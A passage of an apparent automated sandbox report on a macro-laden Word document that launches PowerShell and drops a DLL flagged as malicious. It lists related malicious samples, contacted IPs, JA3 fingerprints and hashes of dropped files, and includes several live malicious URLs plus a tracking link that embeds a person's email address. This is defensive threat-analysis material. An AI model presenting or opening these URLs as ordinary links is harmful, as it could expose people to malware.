                                                                      • 191.6.213.117
                                                                      VQ01173428.docGet hashmaliciousBrowse
                                                                      • 191.6.208.15
                                                                      #U306b#U4fee 2020-09-19.docGet hashmaliciousBrowse
                                                                      • 191.6.222.114
                                                                      http://bhar.com.br/elementos/public/Get hashmaliciousBrowse
                                                                      • 191.6.196.88
                                                                      Untitled_7367763-38724.docGet hashmaliciousBrowse
                                                                      • 191.6.196.95
                                                                      INFO.docGet hashmaliciousBrowse
                                                                      • 191.6.196.95
                                                                      Electronic form.docGet hashmaliciousBrowse
                                                                      • 191.6.196.118
                                                                      20160122_68121911659aa7611b6bcaae131d55b2.jsGet hashmaliciousBrowse
                                                                      • 191.6.192.114
                                                                      20160122_68121911659aa7611b6bcaae131d55b2.jsGet hashmaliciousBrowse
                                                                      • 191.6.192.114
                                                                      Attachments E84598.docGet hashmaliciousBrowse
                                                                      • 177.185.196.31
                                                                      http://crupie.com.br/teste/sites/xfiij3985199578140397829dez486w2hd0plzuic/Get hashmaliciousBrowse
                                                                      • 177.185.206.83
                                                                      rapport du 21 sept..docGet hashmaliciousBrowse
                                                                      • 191.6.204.145
                                                                      CRYSTALTECHUSFILE.docGet hashmaliciousBrowse
                                                                      • 75.103.81.81
                                                                      http://s1022.t.en25.com/e/er?s=1022&lid=2184&elqTrackId=BEDFF87609C7D9DEAD041308DD8FFFB8&lb_email=bkirwer%40farbestfoods.com&elq=b095bd096fb54161953a2cf8316b5d13&elqaid=3115&elqat=1Get hashmaliciousBrowse
                                                                      • 63.134.242.129
                                                                      DOCUMENTO_MEDICO.docGet hashmaliciousBrowse
                                                                      • 209.200.87.182
                                                                      ULffUM9qZE.exeGet hashmaliciousBrowse
                                                                      • 216.119.106.22
                                                                      https://www.raddelmotalaka.com/wp-include/zimonedrive/Get hashmaliciousBrowse
                                                                      • 63.134.242.129

                                                                      JA3 Fingerprints

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      05af1f5ca1b87cc9cc9b25185115607dSecuriteInfo.com.Exploit.Siggen3.8790.14645.xlsGet hashmaliciousBrowse
                                                                      • 177.12.170.95
                                                                      • 35.163.191.195
                                                                      SecuriteInfo.com.Trojan.DOC.Agent.ATB.11104.xlsGet hashmaliciousBrowse
                                                                      • 177.12.170.95
                                                                      • 35.163.191.195
                                                                      Informacion.docGet hashmaliciousBrowse
                                                                      • 177.12.170.95
                                                                      • 35.163.191.195
                                                                      PAYMENT.260121.xlsxGet hashmaliciousBrowse
                                                                      • 177.12.170.95
                                                                      • 35.163.191.195
                                                                      IMG_761213.docGet hashmaliciousBrowse
                                                                      • 177.12.170.95
                                                                      • 35.163.191.195
                                                                      IMG-51033.docGet hashmaliciousBrowse
                                                                      • 177.12.170.95
                                                                      • 35.163.191.195
                                                                      ARCH_98_24301.docGet hashmaliciousBrowse
                                                                      • 177.12.170.95
                                                                      • 35.163.191.195
                                                                      Bestellung.docGet hashmaliciousBrowse
                                                                      • 177.12.170.95
                                                                      • 35.163.191.195
                                                                      Revised-RBG-180129940.xlsxGet hashmaliciousBrowse
                                                                      • 177.12.170.95
                                                                      • 35.163.191.195
                                                                      N00048481397007.docGet hashmaliciousBrowse
                                                                      • 177.12.170.95
                                                                      • 35.163.191.195
                                                                      Order.docGet hashmaliciousBrowse
                                                                      • 177.12.170.95
                                                                      • 35.163.191.195
                                                                      SecuriteInfo.com.Heur.13954.xlsGet hashmaliciousBrowse
                                                                      • 177.12.170.95
                                                                      • 35.163.191.195
                                                                      case_3499.xlsGet hashmaliciousBrowse
                                                                      • 177.12.170.95
                                                                      • 35.163.191.195
                                                                      case.2991.xlsGet hashmaliciousBrowse
                                                                      • 177.12.170.95
                                                                      • 35.163.191.195
                                                                      N00048481397007.docGet hashmaliciousBrowse
                                                                      • 177.12.170.95
                                                                      • 35.163.191.195
                                                                      info5440.xlsGet hashmaliciousBrowse
                                                                      • 177.12.170.95
                                                                      • 35.163.191.195
                                                                      notif-3615.xlsGet hashmaliciousBrowse
                                                                      • 177.12.170.95
                                                                      • 35.163.191.195
                                                                      notif6158.xlsGet hashmaliciousBrowse
                                                                      • 177.12.170.95
                                                                      • 35.163.191.195
                                                                      INC_Y5KPAYAWWU7.docGet hashmaliciousBrowse
                                                                      • 177.12.170.95
                                                                      • 35.163.191.195
                                                                      mensaje_012021_1-538086.docGet hashmaliciousBrowse
                                                                      • 177.12.170.95
                                                                      • 35.163.191.195

                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                                                                      Category:dropped
                                                                      Size (bytes):59134
                                                                      Entropy (8bit):7.995450161616763
                                                                      Encrypted:true
                                                                      SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                                                                      MD5:E92176B0889CC1BB97114BEB2F3C1728
                                                                      SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                                                                      SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                                                                      SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                                                                      Malicious:false
                                                                      Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):893
                                                                      Entropy (8bit):7.366016576663508
                                                                      Encrypted:false
                                                                      SSDEEP:24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
                                                                      MD5:D4AE187B4574036C2D76B6DF8A8C1A30
                                                                      SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
                                                                      SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
                                                                      SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
                                                                      Malicious:false
                                                                      Preview: 0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.2....w..{........s.z..2..~..0....*8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.*....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i....*.)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0...*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..|.Wv..(9..e...w.j..w.......)...55.1.
                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):328
                                                                      Entropy (8bit):3.0664620025581253
                                                                      Encrypted:false
                                                                      SSDEEP:6:kKCHbqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:B3kPlE99SNxAhUeo+aKt
                                                                      MD5:8AB92BD02DEBE46B03720E9B4E92FEF4
                                                                      SHA1:1201275CD8B208AA5FE8B509DD66BD9FE2E53383
                                                                      SHA-256:498E98249C1BB06868B90E21DC38041E9BEF547E0763D61F2ECCB86F00FB6404
                                                                      SHA-512:85CA865095F251133261FC4054866C8623339E466003BAC5E3C5A94B9018CB05ECC3C55214B98C12BF77C485E76ABFC00D989E477DC59D191C114BC8488783FE
                                                                      Malicious:false
                                                                      Preview: p...... ........:..w....(....................................................... ..................&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.e.b.b.a.e.1.d.7.e.a.d.6.1.:.0."...
                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):252
                                                                      Entropy (8bit):3.0215269645321685
                                                                      Encrypted:false
                                                                      SSDEEP:3:kkFkllRzEvfllXlE/QhzllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1UAYpFit:kKwIliBAIdQZV7eAYLit
                                                                      MD5:DC910AE1F9AE675627D93DF168B8B4A7
                                                                      SHA1:F1812087EE764C1ED12E399B164BDBBEA33235D8
                                                                      SHA-256:90278AA59F3EBA385DA5E25B790F7897C21E262DBA2CDC6E08EDBD211A5123A9
                                                                      SHA-512:847369ACB7C56ACE8357FD58CAECF72EDE8444A1659343094373B7C5ED39EF82885B4162C8DA3869D8D74F95EF18737845E46C98B045CC659F0B078BA929479B
                                                                      Malicious:false
                                                                      Preview: p...... ....`....Y.w....(....................................................... ........u.........(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.9.e.7.6.b.3.c.6.4.b.c.0."...
                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A5D6EDBE-EB6B-4CC4-8C38-663EBE143117}.tmp
                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):1024
                                                                      Entropy (8bit):0.05390218305374581
                                                                      Encrypted:false
                                                                      SSDEEP:3:ol3lYdn:4Wn
                                                                      MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                      Malicious:false
                                                                      Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E76E1ED2-1DC6-41B5-9D5C-624688043260}.tmp
                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):1536
                                                                      Entropy (8bit):1.3554734412254814
                                                                      Encrypted:false
                                                                      SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbE:IiiiiiiiiifdLloZQc8++lsJe1MzL
                                                                      MD5:3E5010CAE259871D6964270190F8ADCE
                                                                      SHA1:C57EA259D1DF1C244C8A4C4D3AC7FA37AEFA1869
                                                                      SHA-256:F1B89BC47B850CD5352C45E86AEC6F63F6C80F22FA4A9CC589EF18219E6BF8EB
                                                                      SHA-512:FC6112BB9EF82273E598CF32220CE02EEBC57A9B805E438D3207F5CA7C02C4990E5B5CABF2B1BB7AEF7E9CA69D966DD0E0BD90E2C5B591BBE94FACD3636E2ADD
                                                                      Malicious:false
                                                                      Preview: ..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      C:\Users\user\AppData\Local\Temp\Cab479B.tmp
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                                                                      Category:dropped
                                                                      Size (bytes):59134
                                                                      Entropy (8bit):7.995450161616763
                                                                      Encrypted:true
                                                                      SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                                                                      MD5:E92176B0889CC1BB97114BEB2F3C1728
                                                                      SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                                                                      SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                                                                      SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                                                                      Malicious:false
                                                                      Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                                                                      C:\Users\user\AppData\Local\Temp\Tar479C.tmp
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):152788
                                                                      Entropy (8bit):6.316654432555028
                                                                      Encrypted:false
                                                                      SSDEEP:1536:WIA6c7RbAh/E9nF2hspNuc8odv+1//FnzAYtYyjCQxSMnl3xlUwg:WAmfF3pNuc7v+ltjCQSMnnSx
                                                                      MD5:64FEDADE4387A8B92C120B21EC61E394
                                                                      SHA1:15A2673209A41CCA2BC3ADE90537FE676010A962
                                                                      SHA-256:BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745
                                                                      SHA-512:655458CB108034E46BCE5C4A68977DCBF77E20F4985DC46F127ECBDE09D6364FE308F3D70295BA305667A027AD12C952B7A32391EFE4BD5400AF2F4D0D830875
                                                                      Malicious:false
                                                                      Preview: 0..T...*.H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........R19%..210115004237Z0...+......0..D.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\ARCHIVOFile-20-012021.LNK
                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:12 2020, mtime=Wed Aug 26 14:08:12 2020, atime=Wed Jan 27 19:17:33 2021, length=163328, window=hide
                                                                      Category:dropped
                                                                      Size (bytes):2138
                                                                      Entropy (8bit):4.5326539197703415
                                                                      Encrypted:false
                                                                      SSDEEP:48:8b/XT3Inbeh6o3up5Qh2b/XT3Inbeh6o3up5Q/:8b/XLInbXdp5Qh2b/XLInbXdp5Q/
                                                                      MD5:05A81D9871CC5A9D1C9496971871A4C3
                                                                      SHA1:4B43D1A721FDEED3C350721541F3F032E98057DC
                                                                      SHA-256:F2631F760EED5D1400F08304FDE9686A689A11AAA5343519DF9F988C18ADA39B
                                                                      SHA-512:725EF51348035ACA47084FE0C13FED8AD39801962A1DA3E1854984A78E6769138ACC2874086513B983CC9A9781E9A7E8CCE6B314E3A315826F1106E19158113B
                                                                      Malicious:false
                                                                      Preview: L..................F.... ...$l...{..$l...{....'r.....~...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....|.2..~..;R1. .ARCHIV~1.DOC..`.......Q.y.Q.y*...8.....................A.R.C.H.I.V.O.F.i.l.e.-.2.0.-.0.1.2.0.2.1...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\445817\Users.user\Desktop\ARCHIVOFile-20-012021.doc.0.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.A.R.C.H.I.V.O.F.i.l.e.-.2.0.-.0.1.2.0.2.1...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......445817.........
                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):101
                                                                      Entropy (8bit):4.560529244991619
                                                                      Encrypted:false
                                                                      SSDEEP:3:M1+GFVCl8WLFVClmX1+GFVClv:M4G6rL6PG61
                                                                      MD5:BCAC8ED9B42DA8EFA65F54705C070EC9
                                                                      SHA1:F176DE20E4C0A978E9E5E0039B71EA72D94E1C20
                                                                      SHA-256:E0586F37CF5912AC227F6363F87FF700D71C8C2CE24E933C7DB34DEDD9551F3F
                                                                      SHA-512:F66C0695FAD82E6842E9FDC2AAFBE40FE51EC071737B6F2116C7035895DB01C52934DF3256603C88E158F0AA2435C9C273B8960210845BF3B9FF18FD25CF87E9
                                                                      Malicious:false
                                                                      Preview: [doc]..ARCHIVOFile-20-012021.LNK=0..ARCHIVOFile-20-012021.LNK=0..[doc]..ARCHIVOFile-20-012021.LNK=0..
                                                                      C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):162
                                                                      Entropy (8bit):2.431160061181642
                                                                      Encrypted:false
                                                                      SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                                                      MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                                                      SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                                                      SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                                                      SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                                                      Malicious:false
                                                                      Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1JTN6F3VHEJQWGEUZSLB.temp
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):8016
                                                                      Entropy (8bit):3.587203250476091
                                                                      Encrypted:false
                                                                      SSDEEP:96:chQCIMqZqvsqvJCwofz8hQCIMqZqvsEHyqvJCworZzv9YyH8f8OZlUVNIu:c2wofz82MHnorZzvyf8OIIu
                                                                      MD5:9AFBC91BB6F8B5858AB7A4886ABC3073
                                                                      SHA1:3F15E4645EB1DF3E393D032664CEDF46A22C5A60
                                                                      SHA-256:5D85266D69AFD60CE498DEBB2375E63D81F2534E6F4104692C11D904D81DCCCA
                                                                      SHA-512:6B5F8AA7CBE4E1EA63654DEA4EC746D3A7C0F588D9CE2A48D500BC3175D9D255FBD806CDDA798C04B6D0FCE2F09295F6755A17F482085DE2460ED1269D4EA324
                                                                      Malicious:false
                                                                      Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Q.y..Programs..f.......:...Q.y*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                      C:\Users\user\Desktop\~$CHIVOFile-20-012021.doc
                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):162
                                                                      Entropy (8bit):2.431160061181642
                                                                      Encrypted:false
                                                                      SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                                                      MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                                                      SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                                                      SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                                                      SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                                                      Malicious:false
                                                                      Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                                                                      C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                      Category:modified
                                                                      Size (bytes):354648
                                                                      Entropy (8bit):4.29030621772406
                                                                      Encrypted:false
                                                                      SSDEEP:3072:L82jpiC2JG7HZb7XWQml/jz8A4diTE90Q6kF4CKAYRkcj:I2L7HN7Kl/jLA90QECrYRpj
                                                                      MD5:039810A34BE3DD45B9D30F89E18F46F4
                                                                      SHA1:5F8609A2DB33D6BB70584E1741F428245474146F
                                                                      SHA-256:A9DD98F4B6FE0B997F8B3D50F1CA405F02583A02133874FE123EAEA6C22DAB00
                                                                      SHA-512:8ACA60103958AA461A91F708E0E41A401F316161DEFE9525560AC2E03AEA3566E01F0825410E678B0C76DA7551CE48C2200D01380810CF70AC75F9CC91BCF9FF
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      • Antivirus: Metadefender, Detection: 46%, Browse
                                                                      • Antivirus: ReversingLabs, Detection: 86%
                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.`...........!...2.@..........P........P...............................................................................`..d....................T..X............................................................a..`............................text....6.......8.................. ..`.rdata..W....P.......<..............@..@.data........`.......>..............@....text4.......p.......B..............@....text8..d............H.............. ..@.text7..d............J.............. ..@.text6..d............L.............. ..@.text5..d............N.............. ..@.reloc...............P..............@..B........................................................................................................................................................................................................................................................................

                                                                      Static File Info

                                                                      General

                                                                      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: -535, Keywords: 155, Comments: 43, Thumbnail: 21890, 0x17: 917504CDFV2 Microsoft Word
                                                                      Entropy (8bit):6.828949606327576
                                                                      TrID:
                                                                      • Microsoft Word document (32009/1) 79.99%
                                                                      • Generic OLE2 / Multistream Compound File (8008/1) 20.01%
                                                                      File name:ARCHIVOFile-20-012021.doc
                                                                      File size:163328
                                                                      MD5:d4829a31da294d0ee8f9f67bc1352bd2
                                                                      SHA1:70601272023fd5285194c68da776708508524d50
                                                                      SHA256:4fc909106f65c1ca7c9073743cbc8a7513a4ce7ae3d04e38bd01847e96aaf9f5
                                                                      SHA512:4a3e4ba0671890787590e7abb39dbea6e4b70334d6b7ee8aafb9559184c3d650cf8a04711ba3e863b675afb400c9c8512bbd85393ee89cf359766831a6581d1d
                                                                      SSDEEP:3072:1/X2TdcrrXyQBsc0vWJVi4IrwVOfMb2Y/:1/PPIIx2Y
                                                                      File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                      File Icon

                                                                      Icon Hash:e4eea2aaa4b4b4a4

                                                                      Static OLE Info

                                                                      General

                                                                      Document Type:OLE
                                                                      Number of OLE Files:1

                                                                      OLE File "ARCHIVOFile-20-012021.doc"

                                                                      Indicators

                                                                      Has Summary Info:True
                                                                      Application Name:unknown
                                                                      Encrypted Document:False
                                                                      Contains Word Document Stream:True
                                                                      Contains Workbook/Book Stream:False
                                                                      Contains PowerPoint Document Stream:False
                                                                      Contains Visio Document Stream:False
                                                                      Contains ObjectPool Stream:
                                                                      Flash Objects Count:
                                                                      Contains VBA Macros:True

                                                                      Document Summary

                                                                      Document Code Page:-535
                                                                      Number of Lines:155
                                                                      Number of Paragraphs:43
                                                                      Thumbnail Scaling Desired:False
                                                                      Company:
                                                                      Contains Dirty Links:False
                                                                      Shared Document:False
                                                                      Changed Hyperlinks:False
                                                                      Application Version:917504

                                                                      Streams with VBA

                                                                      VBA File Name: Bcur5699z4d, Stream Size: 1108
                                                                      General
                                                                      Stream Path:Macros/VBA/Bcur5699z4d
                                                                      VBA File Name:Bcur5699z4d
                                                                      Stream Size:1108
